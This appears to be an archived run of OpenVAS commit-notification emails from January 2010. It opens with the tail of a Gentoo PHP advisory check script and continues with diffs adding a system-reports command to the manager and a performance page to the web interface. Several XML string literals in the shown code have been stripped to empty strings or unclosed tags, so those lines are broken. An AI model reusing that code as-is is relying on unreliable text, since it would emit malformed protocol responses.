PHP, the worst of which leading to + the remote execution of arbitrary code. + +Solution: +All PHP users should upgrade to the latest version. As PHP is + statically linked against a vulnerable version of the c-client library + when the imap or kolab USE flag is enabled (GLSA 200911-03), users + should upgrade net-libs/c-client beforehand: + + # emerge --sync + # emerge --ask --oneshot --verbose '>=net-libs/c-client-2007e' + # emerge --ask --oneshot --verbose '>=dev-lang/php-5.2.12' + +http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201001-03 +http://bugs.gentoo.org/show_bug.cgi?id=249875 +http://bugs.gentoo.org/show_bug.cgi?id=255121 +http://bugs.gentoo.org/show_bug.cgi?id=260576 +http://bugs.gentoo.org/show_bug.cgi?id=261192 +http://bugs.gentoo.org/show_bug.cgi?id=266125 +http://bugs.gentoo.org/show_bug.cgi?id=274670 +http://bugs.gentoo.org/show_bug.cgi?id=280602 +http://bugs.gentoo.org/show_bug.cgi?id=285434 +http://bugs.gentoo.org/show_bug.cgi?id=292132 +http://bugs.gentoo.org/show_bug.cgi?id=293888 +http://bugs.gentoo.org/show_bug.cgi?id=297369 +http://bugs.gentoo.org/show_bug.cgi?id=297370 +http://www.gentoo.org/security/en/glsa/glsa-200911-03.xml + +Risk factor : High"; + + script_description(desc); + + script_summary("Gentoo Security Advisory GLSA 201001-03 (php)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com"); + script_family("Gentoo Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/gentoo"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-gentoo.inc"); +vuln = 0; +if(ispkgvuln(pkg:"dev-lang/php", unaffected: make_list("ge 5.2.12"), vulnerable: make_list("lt 5.2.12"))) { + vuln=1; +} + +if(vuln) { + security_hole(0); +} From scm-commit at wald.intevation.org Thu Jan 7 14:16:43 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 7 Jan 2010 14:16:43 +0100 (CET) Subject: [Openvas-commits] r6339 - in trunk/openvas-libraries: . hg Message-ID: <20100107131643.614C986607D1@pyrosoma.intevation.org> Author: felix Date: 2010-01-07 14:16:41 +0100 (Thu, 07 Jan 2010) New Revision: 6339 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/hg/hg_utils.c trunk/openvas-libraries/hg/hg_utils.h Log: * hg/hg_utils.c, hg/hg_utils.h: Formatting and documentation. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-07 12:59:33 UTC (rev 6338) +++ trunk/openvas-libraries/ChangeLog 2010-01-07 13:16:41 UTC (rev 6339) @@ -1,5 +1,17 @@ 2010-01-07 Felix Wolfsteller <felix.wolfsteller at intevation.de> + * hg/hg_utils.c, hg/hg_utils.h: Formatting and documentation. + +2010-01-07 Felix Wolfsteller <felix.wolfsteller at intevation.de> + + * hg/host_gatherer.h: Formatting. + + * hg/Makefile: For clean target, remove test executable. + + * hg/test.c: Formatted, updated doc. + +2010-01-07 Felix Wolfsteller <felix.wolfsteller at intevation.de> + * configure.in: Added comments. * hg/host_gatherer.c, hg/host_gatherer.h: Formatting. Modified: trunk/openvas-libraries/hg/hg_utils.c =================================================================== --- trunk/openvas-libraries/hg/hg_utils.c 2010-01-07 12:59:33 UTC (rev 6338) +++ trunk/openvas-libraries/hg/hg_utils.c 2010-01-07 13:16:41 UTC (rev 6339) @@ -26,7 +26,7 @@ #include "hosts_gatherer.h" /** - * Resolve an hostname + * @brief Resolve an hostname. */ int hg_resolv (char* hostname, struct in6_addr *in6addr, int family) @@ -36,58 +36,59 @@ int retval; *in6addr = in6addr_any; - /* first check whether it is a numeric host*/ - memset(&hints, 0, sizeof(hints)); + /* First check whether it is a numeric host. */ + memset (&hints, 0, sizeof (hints)); hints.ai_family = AF_INET6; hints.ai_flags = AI_V4MAPPED | AI_ALL | AI_NUMERICHOST; - retval = getaddrinfo(hostname, NULL, &hints, &ai); - if(!retval) - { - if(ai->ai_family == AF_INET) + retval = getaddrinfo (hostname, NULL, &hints, &ai); + if (!retval) { + if (ai->ai_family == AF_INET) + { + in6addr->s6_addr32[0] = 0; + in6addr->s6_addr32[1] = 0; + in6addr->s6_addr32[2] = htonl(0xffff); + memcpy (&in6addr->s6_addr32[3], &((struct sockaddr_in *)ai->ai_addr)->sin_addr, sizeof (struct in6_addr)); + } + else + { + memcpy (in6addr, &((struct sockaddr_in6 *)ai->ai_addr)->sin6_addr, sizeof (struct in6_addr)); + } + + freeaddrinfo (ai); + return 0; + } + + /* First check whether it is an ipv4 host. */ + memset (&hints, 0, sizeof (hints)); + hints.ai_family = AF_INET; + + retval = getaddrinfo (hostname, NULL, &hints, &ai); + if (!retval) + { in6addr->s6_addr32[0] = 0; in6addr->s6_addr32[1] = 0; in6addr->s6_addr32[2] = htonl(0xffff); - memcpy(&in6addr->s6_addr32[3], &((struct sockaddr_in *)ai->ai_addr)->sin_addr, sizeof(struct in6_addr)); + memcpy(&in6addr->s6_addr32[3], &((struct sockaddr_in *)ai->ai_addr)->sin_addr, sizeof(struct in_addr)); + freeaddrinfo (ai); + return 0; } - else - { - memcpy(in6addr, &((struct sockaddr_in6 *)ai->ai_addr)->sin6_addr, sizeof(struct in6_addr)); - } - freeaddrinfo(ai); - return 0; - } + /* Check whether it is an ipv6 host. */ + if (family != AF_INET6) + return -1; /* returning in6addr_any */ - /* first check whether it is a ipv4 host*/ - memset(&hints, 0, sizeof(hints)); - hints.ai_family = AF_INET; - - retval = getaddrinfo(hostname, NULL, &hints, &ai); - if(!retval) - { - in6addr->s6_addr32[0] = 0; - in6addr->s6_addr32[1] = 0; - in6addr->s6_addr32[2] = htonl(0xffff); - memcpy(&in6addr->s6_addr32[3], &((struct sockaddr_in *)ai->ai_addr)->sin_addr, sizeof(struct in_addr)); - freeaddrinfo(ai); - return 0; - } - - /* first check whether it is a ipv6 host*/ - if(family != AF_INET6) - return -1; /* returning in6addr_any */ - memset(&hints, 0, sizeof(hints)); + memset (&hints, 0, sizeof(hints)); hints.ai_family = AF_INET6; - retval = getaddrinfo(hostname, NULL, &hints, &ai); - if(!retval) - { - memcpy(in6addr, &((struct sockaddr_in6 *)ai->ai_addr)->sin6_addr, sizeof(struct in6_addr)); - freeaddrinfo(ai); - return 0; - } + retval = getaddrinfo (hostname, NULL, &hints, &ai); + if (!retval) + { + memcpy (in6addr, &((struct sockaddr_in6 *)ai->ai_addr)->sin6_addr, sizeof (struct in6_addr)); + freeaddrinfo (ai); + return 0; + } return -1; /* return in6addr_any*/ } @@ -100,7 +101,7 @@ struct sockaddr_in6 s6addr; struct sockaddr *sa; int len; - + if(IN6_IS_ADDR_V4MAPPED(ip)) { saddr.sin_family = AF_INET; @@ -142,6 +143,9 @@ return 0; /* We never fail */ } +/** + * @return 0 if adress info for \ref hostname could be found, 1 otherwise. + */ int hg_valid_ip_addr (char *hostname) { @@ -149,19 +153,18 @@ struct addrinfo *ai; int retval; - memset(&hints, 0, sizeof(hints)); + memset (&hints, 0, sizeof(hints)); hints.ai_family = AF_INET6; hints.ai_flags = AI_V4MAPPED | AI_NUMERICHOST; - retval = getaddrinfo(hostname, NULL, &hints, &ai); - if(retval) + retval = getaddrinfo (hostname, NULL, &hints, &ai); + if (retval) return 1; else - { - freeaddrinfo(ai); - return 0; - } - + { + freeaddrinfo (ai); + return 0; + } } /** Modified: trunk/openvas-libraries/hg/hg_utils.h =================================================================== --- trunk/openvas-libraries/hg/hg_utils.h 2010-01-07 12:59:33 UTC (rev 6338) +++ trunk/openvas-libraries/hg/hg_utils.h 2010-01-07 13:16:41 UTC (rev 6339) @@ -20,9 +20,10 @@ #define HL2_UTILS_H__ int hg_resolv (char* , struct in6_addr *, int ); -char * hg_name_to_domain(char * name); -void hg_hosts_cleanup(struct hg_host *); -void hg_host_cleanup(struct hg_host *); +char * hg_name_to_domain (char * name); +void hg_hosts_cleanup (struct hg_host *); +void hg_host_cleanup (struct hg_host *); int hg_get_name_from_ip (struct in6_addr *, char *, int); -int hg_valid_ip_addr(char *); +int hg_valid_ip_addr (char *); + #endif From scm-commit at wald.intevation.org Thu Jan 7 14:22:17 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 7 Jan 2010 14:22:17 +0100 (CET) Subject: [Openvas-commits] r6340 - in trunk/openvas-libraries: . hg Message-ID: <20100107132217.04E3A86607C3@pyrosoma.intevation.org> Author: felix Date: 2010-01-07 14:22:17 +0100 (Thu, 07 Jan 2010) New Revision: 6340 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/hg/hg_utils.c Log: * hg/hg_utils.c (hg_resolv): Added TODO about incomplete resolution in case of multiple A Records. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-07 13:16:41 UTC (rev 6339) +++ trunk/openvas-libraries/ChangeLog 2010-01-07 13:22:17 UTC (rev 6340) @@ -1,5 +1,10 @@ 2010-01-07 Felix Wolfsteller <felix.wolfsteller at intevation.de> + * hg/hg_utils.c (hg_resolv): Added TODO about incomplete resolution in + case of multiple A Records. + +2010-01-07 Felix Wolfsteller <felix.wolfsteller at intevation.de> + * hg/hg_utils.c, hg/hg_utils.h: Formatting and documentation. 2010-01-07 Felix Wolfsteller <felix.wolfsteller at intevation.de> Modified: trunk/openvas-libraries/hg/hg_utils.c =================================================================== --- trunk/openvas-libraries/hg/hg_utils.c 2010-01-07 13:16:41 UTC (rev 6339) +++ trunk/openvas-libraries/hg/hg_utils.c 2010-01-07 13:22:17 UTC (rev 6340) @@ -44,6 +44,11 @@ retval = getaddrinfo (hostname, NULL, &hints, &ai); if (!retval) { + /** @TODO getaddrinfo: host might resolve to more than one ip. + * In this case (ai->ai_next != NULL). + * This should somehow be respected, probably needs changes to + * interface. + */ if (ai->ai_family == AF_INET) { in6addr->s6_addr32[0] = 0; From scm-commit at wald.intevation.org Thu Jan 7 21:57:25 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 7 Jan 2010 21:57:25 +0100 (CET) Subject: [Openvas-commits] r6341 - in trunk/openvas-manager: . src src/tests Message-ID: <20100107205725.93E7986607C0@pyrosoma.intevation.org> Author: mattm Date: 2010-01-07 21:57:23 +0100 (Thu, 07 Jan 2010) New Revision: 6341 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/INSTALL trunk/openvas-manager/src/manage.c trunk/openvas-manager/src/manage.h trunk/openvas-manager/src/omp.c trunk/openvas-manager/src/tests/omp_help_0.c Log: Add OMP command GET_SYSTEM_REPORTS. * src/manage.c (make_array, free_array): New functions. From omp.c. (get_system_report_types, init_system_report_type_iterator) (cleanup_report_type_iterator, next_report_type) (report_type_iterator_name, report_type_iterator_title) (manage_system_report): New functions. * src/manage.h: Add headers accordingly. (report_type_iterator_t): New type. * src/omp.c (make_array, free_array): Remove. Move to manage.c. (help_text): Add GET_SYSTEM_REPORTS. (name_command_data_t, get_system_report_data_t): New types. (name_command_data_reset, get_system_report_data_reset): New functions. (command_data_t): Add get_system_report and name_command. (get_system_reports_data): New variable. (client_state_t): Add CLIENT_GET_SYSTEM_REPORTS. (omp_xml_handle_start_element, omp_xml_handle_end_element): Add GET_SYSTEM_REPORTS handling. In CLIENT_GET_TARGETS free current_name. * INSTALL: Add run time requirements. * src/tests/omp_help_0.c (help_text): Add GET_SYSTEM_REPORTS. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-07 13:22:17 UTC (rev 6340) +++ trunk/openvas-manager/ChangeLog 2010-01-07 20:57:23 UTC (rev 6341) @@ -1,3 +1,30 @@ +2010-01-07 Matthew Mundell <matthew.mundell at intevation.de> + + Add OMP command GET_SYSTEM_REPORTS. + + * src/manage.c (make_array, free_array): New functions. From omp.c. + (get_system_report_types, init_system_report_type_iterator) + (cleanup_report_type_iterator, next_report_type) + (report_type_iterator_name, report_type_iterator_title) + (manage_system_report): New functions. + + * src/manage.h: Add headers accordingly. + (report_type_iterator_t): New type. + + * src/omp.c (make_array, free_array): Remove. Move to manage.c. + (help_text): Add GET_SYSTEM_REPORTS. + (name_command_data_t, get_system_report_data_t): New types. + (name_command_data_reset, get_system_report_data_reset): New functions. + (command_data_t): Add get_system_report and name_command. + (get_system_reports_data): New variable. + (client_state_t): Add CLIENT_GET_SYSTEM_REPORTS. + (omp_xml_handle_start_element, omp_xml_handle_end_element): Add + GET_SYSTEM_REPORTS handling. In CLIENT_GET_TARGETS free current_name. + + * INSTALL: Add run time requirements. + + * src/tests/omp_help_0.c (help_text): Add GET_SYSTEM_REPORTS. + 2010-01-06 Matthew Mundell <matthew.mundell at intevation.de> * src/tasks_sql.h (insert_nvt_selectors): Set the family column when Modified: trunk/openvas-manager/INSTALL =================================================================== --- trunk/openvas-manager/INSTALL 2010-01-07 13:22:17 UTC (rev 6340) +++ trunk/openvas-manager/INSTALL 2010-01-07 20:57:23 UTC (rev 6341) @@ -50,3 +50,21 @@ enabled and edited in order to link to a custom installation of OpenVAS. The certificate and key locations in OPENVAS_SERVER_CERTIFICATE, OPENVAS_SERVER_KEY and OPENVAS_CA_CERTIFICATE may also need modifying. + +Certain features of the Manager also require some programs at run time: + +Prerequisites for generating PDF reports: +* pdflatex + +Prerequisites for generating credentials Debian packages: +* fakeroot +* alien + +Prerequisites for generating system reports: +* A program in the PATH, with usage "openvasmr seconds type", where + seconds is the number of seconds before now that the report covers, + and type is the type of report. When called with type "titles" the + script must print a list of possible types, where the name of the + type is everything up to the first space and everything else is a + title for the report. When called with one of these types openvasmr + must print a PNG in base64 encoding. Modified: trunk/openvas-manager/src/manage.c =================================================================== --- trunk/openvas-manager/src/manage.c 2010-01-07 13:22:17 UTC (rev 6340) +++ trunk/openvas-manager/src/manage.c 2010-01-07 20:57:23 UTC (rev 6341) @@ -99,6 +99,40 @@ escalator_data (escalator_t, const char *, const char *); +/* Arrays. */ + +/** + * @brief Make a global array. + * + * @return New array. + */ +GPtrArray * +make_array () +{ + return g_ptr_array_new (); +} + +/** + * @brief Free global array value. + * + * Also g_free any elements. + * + * @param[in] array Pointer to array. + */ +void +free_array (GPtrArray *array) +{ + if (array) + { + int index = 0; + gpointer item; + while ((item = g_ptr_array_index (array, index++))) + g_free (item); + g_ptr_array_free (array, TRUE); + } +} + + /* Credentials. */ /** @@ -1273,3 +1307,186 @@ } return 0; } + + +/* System reports. */ + +#define COMMAND "openvasmr 0 titles" + +/** + * @brief Get system report types. + * + * @param[out] types Types on success. + * + * @return 0 if successful, -1 otherwise. + */ +static int +get_system_report_types (gchar ***types) +{ + gchar *astdout = NULL; + gchar *astderr = NULL; + GError *err = NULL; + gint exit_status; + + tracef (" command: " COMMAND); + + if ((g_spawn_command_line_sync (COMMAND, + &astdout, + &astderr, + &exit_status, + &err) + == FALSE) + || (WIFEXITED (exit_status) == 0) + || WEXITSTATUS (exit_status)) + { + tracef ("%s: openvasmr failed with %d", __FUNCTION__, exit_status); + tracef ("%s: stdout: %s", __FUNCTION__, astdout); + tracef ("%s: stderr: %s", __FUNCTION__, astderr); + g_free (astdout); + g_free (astderr); + return -1; + } + if (astdout) + { + char **type; + *types = type = g_strsplit (g_strchomp (astdout), "\n", 0); + while (*type) + { + char *space; + space = strchr (*type, ' '); + if (space == NULL) + { + g_strfreev (type); + *types = NULL; + g_free (astdout); + g_free (astderr); + return -1; + } + *space = '\0'; + type++; + } + } + else + *types = NULL; + g_free (astdout); + g_free (astderr); + return 0; +} + +#undef COMMAND + +/** + * @brief Initialise a system report type iterator. + * + * @param[in] iterator Iterator. + * + * @return 0 on success, -1 on error. + */ +int +init_system_report_type_iterator (report_type_iterator_t* iterator) +{ + if (get_system_report_types (&iterator->start)) return -1; + iterator->current = iterator->start - 1; + return 0; +} + +/** + * @brief Cleanup a report type iterator. + * + * @param[in] iterator Iterator. + */ +void +cleanup_report_type_iterator (report_type_iterator_t* iterator) +{ + g_strfreev (iterator->start); +} + +/** + * @brief Increment a report type iterator. + * + * The caller must stop using this after it returns FALSE. + * + * @param[in] iterator Task iterator. + * + * @return TRUE if there was a next item, else FALSE. + */ +gboolean +next_report_type (report_type_iterator_t* iterator) +{ + iterator->current++; + if (*iterator->current == NULL) return FALSE; + return TRUE; +} + +/** + * @brief Return the name from a report type iterator. + * + * @param[in] iterator Iterator. + */ +const char* +report_type_iterator_name (report_type_iterator_t* iterator) +{ + return (const char*) *iterator->current; +} + +/** + * @brief Return the title from a report type iterator. + * + * @param[in] iterator Iterator. + */ +const char* +report_type_iterator_title (report_type_iterator_t* iterator) +{ + const char *name = *iterator->current; + return name + strlen (name) + 1; +} + +/** + * @brief Get a system report. + * + * @param[in] name Name of report. + * @param[in] duration Time range of report, in seconds. + * @param[out] report On success, report in base64 if such a report exists + * else NULL. Arbitrary on error. + * + * @return 0 if successful (including failure to find report), -1 on error. + */ +int +manage_system_report (const char *name, const char *duration, char **report) +{ + gchar *astdout = NULL; + gchar *astderr = NULL; + GError *err = NULL; + gint exit_status; + gchar *command; + + /* For simplicity, it's up to the command to do the base64 encoding. */ + command = g_strdup_printf ("openvasmr %s %s", duration, name); + + tracef (" command: %s", command); + + if ((g_spawn_command_line_sync (command, + &astdout, + &astderr, + &exit_status, + &err) + == FALSE) + || (WIFEXITED (exit_status) == 0) + || WEXITSTATUS (exit_status)) + { + tracef ("%s: openvasmr failed with %d", __FUNCTION__, exit_status); + tracef ("%s: stdout: %s", __FUNCTION__, astdout); + tracef ("%s: stderr: %s", __FUNCTION__, astderr); + g_free (astdout); + g_free (astderr); + g_free (command); + return -1; + } + if (astdout) + *report = astdout; + else + *report = NULL; + g_free (astderr); + g_free (command); + return 0; +} Modified: trunk/openvas-manager/src/manage.h =================================================================== --- trunk/openvas-manager/src/manage.h 2010-01-07 13:22:17 UTC (rev 6340) +++ trunk/openvas-manager/src/manage.h 2010-01-07 20:57:23 UTC (rev 6341) @@ -60,6 +60,17 @@ cleanup_manage_process (); +/* Arrays. */ + +typedef GPtrArray array_t; + +array_t * +make_array (); + +void +free_array (array_t *array); + + /* Credentials. */ /** @@ -711,8 +722,6 @@ /* Configs. */ -typedef GPtrArray array_t; - typedef struct { char *name; @@ -1055,4 +1064,31 @@ int manage_check_current_task (); + +/* System reports. */ + +typedef struct +{ + gchar **start; + gchar **current; +} report_type_iterator_t; + +int +init_system_report_type_iterator (report_type_iterator_t*); + +void +cleanup_report_type_iterator (report_type_iterator_t*); + +gboolean +next_report_type (report_type_iterator_t*); + +const char* +report_type_iterator_name (report_type_iterator_t*); + +const char* +report_type_iterator_title (report_type_iterator_t*); + +int +manage_system_report (const char *, const char *, char **); + #endif /* not OPENVAS_MANAGER_MANAGE_H */ Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2010-01-07 13:22:17 UTC (rev 6340) +++ trunk/openvas-manager/src/omp.c 2010-01-07 20:57:23 UTC (rev 6341) @@ -129,17 +129,6 @@ } /** - * @brief Make a global array. - * - * @return New array. - */ -static GPtrArray * -make_array () -{ - return g_ptr_array_new (); -} - -/** * @brief Push a generic pointer onto a global array. * * @param[in] array Array. @@ -161,26 +150,6 @@ } /** - * @brief Free global array value. - * - * Also g_free any elements. - * - * @param[in] array Pointer to array. - */ -static void -free_array (GPtrArray *array) -{ - if (array) - { - int index = 0; - gpointer item; - while ((item = g_ptr_array_index (array, index++))) - g_free (item); - g_ptr_array_free (array, TRUE); - } -} - -/** * @brief Reset an array. * * @param[in] array Pointer to array. @@ -309,6 +278,7 @@ " GET_REPORT Get a report identified by its unique ID.\n" " GET_RULES Get the rules for the authenticated user.\n" " GET_STATUS Get task status information.\n" +" GET_SYSTEM_REPORTS Get all system reports.\n" " GET_TARGETS Get all targets.\n" " GET_VERSION Get the OpenVAS Manager Protocol version.\n" " HELP Get this help text.\n" @@ -508,9 +478,37 @@ memset (data, 0, sizeof (create_config_data_t)); } +typedef struct +{ + char *name; +} name_command_data_t; + +void +name_command_data_reset (name_command_data_t *data) +{ + free (data->name); + memset (data, 0, sizeof (name_command_data_t)); +} + +typedef struct +{ + char *name; + char *duration; +} get_system_reports_data_t; + +void +get_system_reports_data_reset (get_system_reports_data_t *data) +{ + free (data->name); + free (data->duration); + memset (data, 0, sizeof (get_system_reports_data_t)); +} + typedef union { create_config_data_t create_config; + get_system_reports_data_t get_system_reports; + name_command_data_t name_command; } command_data_t; void @@ -527,6 +525,9 @@ create_config_data_t *create_config_data = (create_config_data_t*) &(command_data.create_config); +get_system_reports_data_t *get_system_reports_data + = &(command_data.get_system_reports); + import_config_data_t *import_config_data = (import_config_data_t*) &(command_data.create_config.import); @@ -768,6 +769,7 @@ CLIENT_GET_REPORT, CLIENT_GET_RULES, CLIENT_GET_STATUS, + CLIENT_GET_SYSTEM_REPORTS, CLIENT_GET_TARGETS, CLIENT_HELP, CLIENT_MODIFY_REPORT, @@ -1469,6 +1471,19 @@ } else if (strcasecmp ("GET_RULES", element_name) == 0) set_client_state (CLIENT_GET_RULES); + else if (strcasecmp ("GET_SYSTEM_REPORTS", element_name) == 0) + { + const gchar* attribute; + if (find_attribute (attribute_names, attribute_values, + "name", &attribute)) + openvas_append_string (&(get_system_reports_data->name), + attribute); + if (find_attribute (attribute_names, attribute_values, + "duration", &attribute)) + openvas_append_string (&(get_system_reports_data->duration), + attribute); + set_client_state (CLIENT_GET_SYSTEM_REPORTS); + } else if (strcasecmp ("GET_TARGETS", element_name) == 0) { const gchar* attribute; @@ -1983,6 +1998,21 @@ } break; + case CLIENT_GET_SYSTEM_REPORTS: + { + if (send_element_error_to_client ("get_system_reports", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + case CLIENT_GET_TARGETS: { if (send_element_error_to_client ("get_targets", element_name)) @@ -8372,6 +8402,82 @@ break; } + case CLIENT_GET_SYSTEM_REPORTS: + { + assert (strcasecmp ("GET_SYSTEM_REPORTS", element_name) == 0); + + if (get_system_reports_data->name + && (strcasecmp (get_system_reports_data->name, + "types") + == 0)) + { + report_type_iterator_t types; + + if (init_system_report_type_iterator (&types)) + SEND_TO_CLIENT_OR_FAIL + (XML_INTERNAL_ERROR ("get_system_reports")); + else + { + SEND_TO_CLIENT_OR_FAIL ("<get_system_reports_response" + " status=\"" STATUS_OK "\"" + " status_text=\"" STATUS_OK_TEXT "\">" + "<system_report>" + "<name>types</name>" + "<report>"); + while (next_report_type (&types)) + SENDF_TO_CLIENT_OR_FAIL + ("<system_report>" + "<name>%s</name>" + "<title>%s" + "", + report_type_iterator_name (&types), + report_type_iterator_title (&types)); + cleanup_report_type_iterator (&types); + SEND_TO_CLIENT_OR_FAIL + ("" + "" + ""); + } + } + else + { + char *report; + + SEND_TO_CLIENT_OR_FAIL + (""); + + if (manage_system_report (get_system_reports_data->name, + get_system_reports_data->duration, + &report)) + SEND_TO_CLIENT_OR_FAIL + (XML_INTERNAL_ERROR ("get_system_reports")); + else if (report) + { + SENDF_TO_CLIENT_OR_FAIL + ("" + "%s" + "" + "%s" + "" + "", + get_system_reports_data->name, + get_system_reports_data->duration, + report); + free (report); + } + else + SEND_TO_CLIENT_OR_FAIL + (XML_ERROR_SYNTAX ("get_system_reports", + "Failed to find report with given name")); + SEND_TO_CLIENT_OR_FAIL (""); + } + get_system_reports_data_reset (get_system_reports_data); + set_client_state (CLIENT_AUTHENTIC); + break; + } + case CLIENT_GET_TARGETS: { iterator_t targets, tasks; @@ -8432,6 +8538,7 @@ cleanup_iterator (&targets); SEND_TO_CLIENT_OR_FAIL (""); openvas_free_string_var (¤t_format); + openvas_free_string_var (¤t_name); set_client_state (CLIENT_AUTHENTIC); break; } Modified: trunk/openvas-manager/src/tests/omp_help_0.c =================================================================== --- trunk/openvas-manager/src/tests/omp_help_0.c 2010-01-07 13:22:17 UTC (rev 6340) +++ trunk/openvas-manager/src/tests/omp_help_0.c 2010-01-07 20:57:23 UTC (rev 6341) @@ -63,6 +63,7 @@ " GET_REPORT Get a report identified by its unique ID.\n" " GET_RULES Get the rules for the authenticated user.\n" " GET_STATUS Get task status information.\n" +" GET_SYSTEM_REPORTS Get all system reports.\n" " GET_TARGETS Get all targets.\n" " GET_VERSION Get the OpenVAS Manager Protocol version.\n" " HELP Get this help text.\n" From scm-commit at wald.intevation.org Thu Jan 7 22:11:52 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 7 Jan 2010 22:11:52 +0100 (CET) Subject: [Openvas-commits] r6342 - in trunk/gsa: . src src/html src/html/src Message-ID: <20100107211152.49FB686607A4@pyrosoma.intevation.org> Author: mattm Date: 2010-01-07 22:11:51 +0100 (Thu, 07 Jan 2010) New Revision: 6342 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c trunk/gsa/src/gsad_omp.c trunk/gsa/src/gsad_omp.h trunk/gsa/src/html/header.m4 trunk/gsa/src/html/src/gsad.xsl trunk/gsa/src/html/src/omp.xsl Log: Add performance reports page. * src/gsad_omp.c (get_system_reports_omp, get_system_report_omp): New function. * src/gsad_omp.h: Add headers accordingly. * src/gsad.c (init_validator): Add get_system_reports command. Add rule "duration". (exec_omp_get): Add get_system_reports command handling. (request_handler): Add system report image response. * src/html/src/omp.xsl (system_report, get_system_reports): New templates. * src/html/header.m4, src/html/src/gsad.xsl: Add "Performance" menu item. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-07 20:57:23 UTC (rev 6341) +++ trunk/gsa/ChangeLog 2010-01-07 21:11:51 UTC (rev 6342) @@ -1,3 +1,21 @@ +2010-01-07 Matthew Mundell + + Add performance reports page. + + * src/gsad_omp.c (get_system_reports_omp, get_system_report_omp): New + function. + + * src/gsad_omp.h: Add headers accordingly. + + * src/gsad.c (init_validator): Add get_system_reports command. Add rule + "duration". + (exec_omp_get): Add get_system_reports command handling. + (request_handler): Add system report image response. + + * src/html/src/omp.xsl (system_report, get_system_reports): New templates. + + * src/html/header.m4, src/html/src/gsad.xsl: Add "Performance" menu item. + 2010-01-06 Felix Wolfsteller * src/html/src/help/configure_scanconfigs.htm4: Added help text about Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2010-01-07 20:57:23 UTC (rev 6341) +++ trunk/gsa/src/gsad.c 2010-01-07 21:11:51 UTC (rev 6342) @@ -194,6 +194,7 @@ "|(get_settings)" "|(get_status)" "|(get_target)" + "|(get_system_reports)" "|(get_targets)" "|(get_users)" "|(import_config)" @@ -238,6 +239,7 @@ openvas_validator_alias (validator, "base", "name"); + openvas_validator_alias (validator, "duration", "number"); openvas_validator_alias (validator, "escalator", "name"); openvas_validator_alias (validator, "scanconfig", "name"); openvas_validator_alias (validator, "scantarget", "name"); @@ -1651,6 +1653,7 @@ const char *sort_order = NULL; const char *levels = NULL; const char *refresh_interval = NULL; + const char *duration = NULL; int high = 0, medium = 0, low = 0, log = 0; credentials_t *credentials = NULL; @@ -1744,11 +1747,17 @@ sort_field = NULL; refresh_interval = MHD_lookup_connection_value (connection, - MHD_GET_ARGUMENT_KIND, - "refresh_interval"); + MHD_GET_ARGUMENT_KIND, + "refresh_interval"); if (openvas_validate (validator, "refresh_interval", refresh_interval)) refresh_interval = NULL; + duration = MHD_lookup_connection_value (connection, + MHD_GET_ARGUMENT_KIND, + "duration"); + if (openvas_validate (validator, "duration", duration)) + duration = NULL; + sort_order = MHD_lookup_connection_value (connection, MHD_GET_ARGUMENT_KIND, "sort_order"); @@ -1987,6 +1996,9 @@ else if (!strcmp (cmd, "get_status")) return get_status_omp (credentials, NULL, sort_field, sort_order, refresh_interval); + else if ((!strcmp (cmd, "get_system_reports"))) + return get_system_reports_omp (credentials, duration); + else if ((!strcmp (cmd, "get_target")) && (name != NULL)) return get_target_omp (credentials, name, sort_field, sort_order); @@ -2365,6 +2377,45 @@ return MHD_YES; } + if (!strncmp (&url[0], "/system_report/", + strlen ("/system_report/"))) /* flawfinder: ignore, + it is a const str */ + { + unsigned int res_len; + const char *duration; + + duration = MHD_lookup_connection_value (connection, + MHD_GET_ARGUMENT_KIND, + "duration"); + if (openvas_validate (validator, "duration", duration)) + duration = NULL; + + res = get_system_report_omp (credentials, + &url[0] + strlen ("/system_report/"), + duration, + &content_type, + &content_disposition, + &res_len); + if (res == NULL) return MHD_NO; + response = MHD_create_response_from_data (res_len, res, + MHD_NO, MHD_YES); + if (content_type != NULL) + { + MHD_add_response_header (response, MHD_HTTP_HEADER_CONTENT_TYPE, + content_type); + content_type = NULL; + } + if (content_disposition != NULL) + { + MHD_add_response_header (response, "Content-Disposition", + content_disposition); + content_disposition = NULL; + } + ret = MHD_queue_response (connection, MHD_HTTP_OK, response); + MHD_destroy_response (response); + return MHD_YES; + } + /* URL requests neither an OMP command nor a special GSAD command, * so it is a simple file. */ Modified: trunk/gsa/src/gsad_omp.c =================================================================== --- trunk/gsa/src/gsad_omp.c 2010-01-07 20:57:23 UTC (rev 6341) +++ trunk/gsa/src/gsad_omp.c 2010-01-07 21:11:51 UTC (rev 6342) @@ -3819,6 +3819,163 @@ } } +/** + * @brief Get all system reports, XSL transform the result. + * + * @param[in] credentials Username and password for authentication. + * @param[in] duration Duration of reports, in seconds. + * + * @return Result of XSL transformation. + */ +char * +get_system_reports_omp (credentials_t * credentials, const char * duration) +{ + entity_t entity; + GString *xml; + gnutls_session_t session; + int socket; + + if (manager_connect (credentials, &socket, &session)) + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting the system reports. " + "The current list of system reports is not 